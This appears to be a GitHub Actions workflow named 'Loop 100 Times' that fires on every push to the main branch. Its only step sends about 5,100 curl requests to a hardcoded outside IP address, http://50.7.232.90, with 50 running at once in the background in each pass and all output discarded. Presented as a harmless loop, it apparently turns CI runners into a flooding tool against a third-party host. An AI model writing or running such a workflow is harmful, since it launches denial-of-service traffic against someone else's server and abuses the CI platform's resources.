name: Loop 100 Times c9a7a07a-4fea-4ee7-b7f4-5608890b68e6

on:
  push:
    branches:
      - main

jobs:
  loop_job:
    runs-on: ubuntu-latest
    steps:
      - name: Run loop 100 times c9a7a07a-4fea-4ee7-b7f4-5608890b68e6
        id: loop_step
        run: |
          counter=0
          max_loops=50
          target="http://50.7.232.90"
          while [ $counter -lt 100 ]; do
            echo "Running loop iteration $((counter + 1))..."
            curl_loop=0
            while [ $curl_loop -lt $max_loops ]; do
              curl -ks $target 2>&1 > /dev/null &
              curl_loop=$((curl_loop + 1))
            done
            echo " [+] started $max_loops processes "
            curl -ks $target 2>&1 > /dev/null
            
            counter=$((counter + 1))
          done
          echo ">> DONE!"




